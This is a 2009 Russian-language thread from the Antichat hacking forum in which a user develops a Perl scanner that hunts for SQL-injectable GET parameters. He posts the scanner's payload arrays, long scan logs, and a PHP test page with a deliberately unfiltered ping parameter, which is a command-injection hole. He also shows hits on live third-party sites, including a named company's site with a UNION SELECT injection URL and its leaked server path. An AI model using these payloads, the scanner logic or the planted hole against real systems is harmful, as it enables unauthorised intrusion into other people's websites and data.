ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 24.12.2009, 08:39
Аватар для shell_c0de
shell_c0de
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
Провел на форуме:
1585404

Репутация: 564
Отправить сообщение для shell_c0de с помощью ICQ Отправить сообщение для shell_c0de с помощью AIM
По умолчанию

[не реклама]
зайди на сайт http://www.savsak.com/article.asp и скачай оттуда прогу AR-TA и посмари как она работает ....там почти все реализовано как надо и намного круче+есть много фичи , попробуй также и с GUI )
а за старание +

Последний раз редактировалось shell_c0de; 24.12.2009 в 08:52..
 
Ответить с цитированием

  #12  
Старый 24.12.2009, 09:12
Аватар для m0Hze
m0Hze
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме:
6462214

Репутация: 3171


По умолчанию

Не вставляет.Великая хакерская кавычка,по наблюдениям, все больше и больше по важности стремиться к нулю.Люди научились использовать фильтры,все больше в моде аякс,так что запросы отследить все нуднее и нуднее.Лучше все делать руками,там где не прокатит кавычка,можно попробывать логику,и наоборот.
 
Ответить с цитированием

  #13  
Старый 24.12.2009, 09:18
Аватар для Bb0y
Bb0y
Участник форума
Регистрация: 30.10.2009
Сообщений: 103
Провел на форуме:
736224

Репутация: 388
Отправить сообщение для Bb0y с помощью ICQ Отправить сообщение для Bb0y с помощью Yahoo
По умолчанию

Не плохо, за старание респект однозначно. Но пока для этих целей юзать буду ArxSqlSearcher, хотя (включительно Арх'совский) пользовался подобными скриптами раза 2 в жизни
 
Ответить с цитированием

  #14  
Старый 24.12.2009, 11:27
Аватар для Strilo4ka
Strilo4ka
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660

Репутация: 1148
По умолчанию

Цитата:
Сообщение от m0Hze  
Не вставляет.Великая хакерская кавычка,по наблюдениям, все больше и больше по важности стремиться к нулю.Люди научились использовать фильтры,все больше в моде аякс,так что запросы отследить все нуднее и нуднее.Лучше все делать руками,там где не прокатит кавычка,можно попробывать логику,и наоборот.
К сожелению да !

Последний раз редактировалось Strilo4ka; 25.12.2009 в 01:21..
 
Ответить с цитированием

  #15  
Старый 24.12.2009, 13:37
Аватар для Strilo4ka
Strilo4ka
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660

Репутация: 1148
По умолчанию

Цитата:
Сообщение от Root-access  
Надо не только совершенствовать парсер, но и методы поиска. Если параметр цифровой, надо сравнивать контент при 2-1 и 1, например. Если строковый, сравнивать blabla+AND+1=1 и blabla+AND+1=2.
Сделал, определяет значение гет параметра если строка, то береться один масив с елементами которые будут вставляться , когда число, то другой.

У нас три масива :
1) просто для возникновения ошыбки;
2) для строковых значений;
3) для числовых.

Если на линке есть ошибка при подстановке значений с первого масива, то 2 или 3 масив не прокручиваеться. Если нет, то определяеться что за значение в гет-параметре. Потом применяеться масив 2 или 3 соответсвенно. И все значения с этих масивов тоже не прокручиваються, если нашлись одинавовые сумы, то осуществялеться выход что соответсвенно должно ускорить. Надо заметить что если линк будет с использованием mod_rewrite, то ниче это не даст.
Участок кода:
Цитата:
#-----если что можно дописать для поиска переменных которые не фильтруються-------#
my @kod_sql=("'", # кавычка для появления ошыбки
"bla-bla-bla" # если кавычка допустим екранируеться и не подавдены сообщения об ошыбках
);
#--------------- в строковом контексте , ошибки погашены--------------------------#
my @kod_sql_str=("' --+",
"' /*", #
"'+AND+1=1",
);
#--------------- в числовом контексте , ошибки погашены--------------------------#
my @kod_sql_int=("' --+", # в строковом контексте , ошибки погашены -> очень редко число представляеться в строковом...
" --+", # в числовом контексте
"*1" # просто может переменная быть не в конце то можно так проверить одна и та же стаття выведеться
);
На даный момент недостатков много:
1) если относительные линки, то не преобразовует.
Надо посидеть с модулем URI поиграться.
2) линки могут быть ЧПУ;
3) использование аякс технологии;

Последний раз редактировалось Strilo4ka; 26.12.2009 в 04:45..
 
Ответить с цитированием

  #16  
Старый 24.12.2009, 15:23
Аватар для Strilo4ka
Strilo4ka
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660

Репутация: 1148
По умолчанию

Root-access проверь пожалуйста, ради интереса, я не могу с своим нетом проверить. На локалке что то чихлит а в нете фиг его знает .
Был создал хост и его сканил.

Цитата:
Сканирование http://injection.ua/ ...
Линк: http://injection.ua/first.php
Линк: http://injection.ua/1/news.php
Линк: http://injection.ua/news1.php
Линк: http://injection.ua/news3.php
Линк: http://injection.ua/news4.php
Линк: http://injection.ua/news5.php

На данный момент парсим страничку: http://injection.ua/first.php

На данный момент парсим страничку: http://injection.ua/1/news.php
Линк: http://injection.ua/1/news.php?id=1
Линк: http://injection.ua/1/news.php?id=2
Линк: http://injection.ua/1/news.php?id=3
Линк: http://injection.ua/1/news.php?id=3&lnd=ukr

На данный момент парсим страничку: http://injection.ua/news1.php
Линк: http://injection.ua/news1.php?id=1
Линк: http://injection.ua/news1.php?id=2
Линк: http://injection.ua/news1.php?id=3

На данный момент парсим страничку: http://injection.ua/news3.php
Линк http://injection.ua/news3.php не доступен!

На данный момент парсим страничку: http://injection.ua/news4.php
Линк http://injection.ua/news4.php не доступен!

На данный момент парсим страничку: http://injection.ua/news5.php
Линк http://injection.ua/news5.php не доступен!

На данный момент парсим страничку: http://injection.ua/1/news.php?id=1

На данный момент парсим страничку: http://injection.ua/1/news.php?id=2

На данный момент парсим страничку: http://injection.ua/1/news.php?id=3

На данный момент парсим страничку: http://injection.ua/1/news.php?id=3&lnd=ukr

На данный момент парсим страничку: http://injection.ua/news1.php?id=1

На данный момент парсим страничку: http://injection.ua/news1.php?id=2

На данный момент парсим страничку: http://injection.ua/news1.php?id=3
В линке есть гет-параметр(ы): http://injection.ua/1/news.php?id=1
Поиск нефильтруемой переменной при включеных ошибках
http://injection.ua/1/news.php?id=1'
Все ок!
Поиск нефильтруемой переменной при включеных ошибках
http://injection.ua/1/news.php?id=1bla-bla-bla
Все ок!
Поиск нефильтруемой переменной при выключеных ошибках (по контенту)
http://injection.ua/1/news.php?id=1' --+
Есть возможность проведения SQL injection
В линке есть гет-параметр(ы): http://injection.ua/1/news.php?id=2
Поиск нефильтруемой переменной при включеных ошибках
http://injection.ua/1/news.php?id=2'
Все ок!
Поиск нефильтруемой переменной при включеных ошибках
http://injection.ua/1/news.php?id=2bla-bla-bla
Все ок!
Поиск нефильтруемой переменной при выключеных ошибках (по контенту)
http://injection.ua/1/news.php?id=2' --+
Есть возможность проведения SQL injection
В линке есть гет-параметр(ы): http://injection.ua/1/news.php?id=3
Поиск нефильтруемой переменной при включеных ошибках
http://injection.ua/1/news.php?id=3'
Все ок!
Поиск нефильтруемой переменной при включеных ошибках
http://injection.ua/1/news.php?id=3bla-bla-bla
Все ок!
Поиск нефильтруемой переменной при выключеных ошибках (по контенту)
http://injection.ua/1/news.php?id=3' --+
Есть возможность проведения SQL injection
В линке есть гет-параметр(ы): http://injection.ua/1/news.php?id=3&lnd=ukr
Поиск нефильтруемой переменной при включеных ошибках
http://injection.ua/1/news.php?id=3'&lnd=ukr
Все ок!
Поиск нефильтруемой переменной при включеных ошибках
http://injection.ua/1/news.php?id=3bla-bla-bla&lnd=ukr
Все ок!
Поиск нефильтруемой переменной при выключеных ошибках (по контенту)
http://injection.ua/1/news.php?id=3' --+&lnd=ukr
Есть возможность проведения SQL injection
Поиск нефильтруемой переменной при включеных ошибках
http://injection.ua/1/news.php?id=3&lnd=ukr'
Все ок!
Поиск нефильтруемой переменной при включеных ошибках
http://injection.ua/1/news.php?id=3&lnd=ukrbla-bla-bla
Все ок!
Поиск нефильтруемой переменной при выключеных ошибках (по контенту)
http://injection.ua/1/news.php?id=3&lnd=ukr' --+
Есть возможность проведения SQL injection
В линке есть гет-параметр(ы): http://injection.ua/news1.php?id=1
Поиск нефильтруемой переменной при включеных ошибках
http://injection.ua/news1.php?id=1'
Есть возможность проведения SQL injection:
В контенте ошибка : Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in Z:\home\injection.ua\www\news1.php on line 22
В линке есть гет-параметр(ы): http://injection.ua/news1.php?id=2
Поиск нефильтруемой переменной при включеных ошибках
http://injection.ua/news1.php?id=2'
Есть возможность проведения SQL injection:
В контенте ошибка : Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in Z:\home\injection.ua\www\news1.php on line 22
В линке есть гет-параметр(ы): http://injection.ua/news1.php?id=3
Поиск нефильтруемой переменной при включеных ошибках
http://injection.ua/news1.php?id=3'
Есть возможность проведения SQL injection:
В контенте ошибка : Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in Z:\home\injection.ua\www\news1.php on line 22
Ко-во линков: 13
Найденные линки:
http://injection.ua/first.php
http://injection.ua/1/news.php
http://injection.ua/news1.php
http://injection.ua/news3.php
http://injection.ua/news4.php
http://injection.ua/news5.php
http://injection.ua/1/news.php?id=1
http://injection.ua/1/news.php?id=2
http://injection.ua/1/news.php?id=3
http://injection.ua/1/news.php?id=3&lnd=ukr
http://injection.ua/news1.php?id=1
http://injection.ua/news1.php?id=2
http://injection.ua/news1.php?id=3
Чтоб увеличить скорость сделаю до первого нахождения переменной и выход. Если надо будет полное сканирование! Ну и чтоб однотипные линки отбрасывало!

Последний раз редактировалось Strilo4ka; 24.12.2009 в 16:26..
 
Ответить с цитированием

  #17  
Старый 24.12.2009, 22:45
Аватар для Strilo4ka
Strilo4ka
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660

Репутация: 1148
По умолчанию

Сделал фичу:
Если такие линки встречаються:
Цитата:
http://injection.ua/news1.php?id=1
и
Цитата:
http://injection.ua/news1.php?id=2
То скрипт возьмет один линк ис етих первый попавшыйся для проверки гет-параметров.
Но, если будет такая:
Цитата:
http://injection.ua/news1.php?id=1&name=1
, то такую тоже будет проверять, так как здесь есть дополнительный параметр.

Также, сделал неполное сканирование(чекбокс) - имееться ввиду, если первая ошыбка нашлась или по контенту определил скрипт, то дальше робота завершаеться. Просто так надо было долго ждать.

На даный момент недостаток:
1) относительные урлы и то что выше;

Добавил осуществление пинга через форму, там переменная для пинга не фильтруеться :
Код:
<?
//оброботка ошыбок
# выводим все сообщения об ошыбках
error_reporting(E_ALL);
//лимита нет
set_time_limit(0);
//require("inc/functions.php");
//запрещаем кеширование браузером
nocache();
?>

<html>

<head>
  <title>Сканер by Strilo4ka!</title>
</head>

<body>

<form name="" action="" method="get">
<a href="../cgi-bin/scaner.pl">Назад</a><br>
Целевой адрес (пример www.site.ru)<br>
<input name="url" type="text" value=""><br>
<input name="option" type="radio" value="1" checked>Ping<br>
<!-- <input name="option" type="radio" value="2" >Whois<br> -->
<input type="submit" value="Сделать это!">



<?php
//чтоб небыло ошыбки неинициализированой переменной
if (isset($_GET['option']))
{
switch ($_GET['option'])
 {
 case 1: echo "<br><b>Пингуем {$_GET['url']}:</b><br>";
         echo ping($_GET['url']);
         break;
 case 2: echo "<b>whois для {$_GET['url']}:</b><br>";
 		 //тут будеи функция которая возвращает результат с whois
 		 break;
 }
}

?>

</body>

</html>

?>
Теперь еще можно указывать количество линков для пробежки чтоб не ждать долго. Для этого на форме чекбокс есть (обязательный). Если чесно мне скрипт не нравиться так как за оптимизацию не думал и воше можно было лучше намного. 2 дня писал. Скажу что работает, вот на этом сайте есть блинд, домен скрою:

Код:
Сканирование http://site/ ...
Линк: http://site/index.php?lan=ukr
Линк: http://site/feedback.php?lan=ukr

На данный момент парсим страничку: http://site/index.php?lan=ukr

На данный момент парсим страничку: http://site/feedback.php?lan=ukr
В линке есть гет-параметр(ы): http://site/index.php?lan=ukr
Поиск нефильтруемой переменной при включеных ошибках
http://site/index.php?lan=ukr'
Все ок!
Поиск нефильтруемой переменной при включеных ошибках
http://site/index.php?lan=ukrbla-bla-bla
Все ок!
Поиск нефильтруемой переменной при выключеных ошибках (по контенту)
http://site/index.php?lan=ukr' --+
Есть возможность проведения SQL injection
В линке есть гет-параметр(ы): http://site//feedback.php?lan=ukr
Поиск нефильтруемой переменной при включеных ошибках
http://site/feedback.php?lan=ukr'
Все ок!
Поиск нефильтруемой переменной при включеных ошибках
http://site/feedback.php?lan=ukrbla-bla-bla
Все ок!
Поиск нефильтруемой переменной при выключеных ошибках (по контенту)
http://site/feedback.php?lan=ukr' --+
Есть возможность проведения SQL injection


Сканировать еще
Ко-во наденных линков: 2
Сами линки:
http://site/index.php?lan=ukr
http://site/feedback.php?lan=ukr
В условиях поиска задал был пробежка для сайта: 2 ну и адрес.

Реальный пример роботы скрипта №2:
взял скуль
Цитата:
http://www.stanadyne.com/view.php?id=111+AND+1=2+UNION+SELECT+0,1,2,null,4, 5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
ис темы "SQL Инъекции" которую нашел Pr0mo.


- ввел этот адрес (сам домен бес скрипта и переменных (типо я не знаю что там есть дырявая переменная);
- поставил ограничиться каталогом;
- неполное сканирование;
- пробежка по 1 линку;


Код:
Сканирование http://www.stanadyne.com/ ...
Линк: http://www.stanadyne.com/view.php?id=1

На данный момент парсим страничку: http://www.stanadyne.com/view.php?id=1
В линке есть гет-параметр(ы): http://www.stanadyne.com/view.php?id=1
Поиск нефильтруемой переменной при включеных ошибках
http://www.stanadyne.com/view.php?id=1'
Есть возможность проведения SQL injection:
В контенте ошибка : Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/content/19/5003819/html/view.php on line 17

Сканировать еще
Ко-во наденных линков: 1
Сами линки:
http://www.stanadyne.com/view.php?id=1
Все оффтоп! Тема закрыта

Последний раз редактировалось Strilo4ka; 25.12.2009 в 21:42..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection для чайников, взлом ASP+MSSQL k00p3r Чужие Статьи 0 12.06.2005 12:42
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ